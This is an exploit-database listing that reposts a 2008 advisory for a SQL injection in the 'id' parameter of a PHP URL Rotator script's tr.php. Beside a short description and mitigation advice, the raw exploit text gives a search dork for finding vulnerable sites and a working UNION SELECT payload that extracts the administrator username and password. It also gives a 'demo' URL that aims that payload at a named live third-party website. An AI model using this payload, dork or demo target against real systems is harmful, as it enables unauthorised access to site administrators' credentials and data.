header-logo
Suggest Exploit
vendor:
URL Rotator
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: URL Rotator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

URL Rotator ( id ) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to the 'tr.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the vulnerable application, disclose sensitive information, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is also recommended to use parameterized queries instead of dynamic queries.
Source

Exploit-DB raw data:

URL Rotator ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/urlrotator.php

DorK   : Copyright ©  Rotator 2008

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.safelistadtrading.com/urlrotator/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--






Greetz : All my freind

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR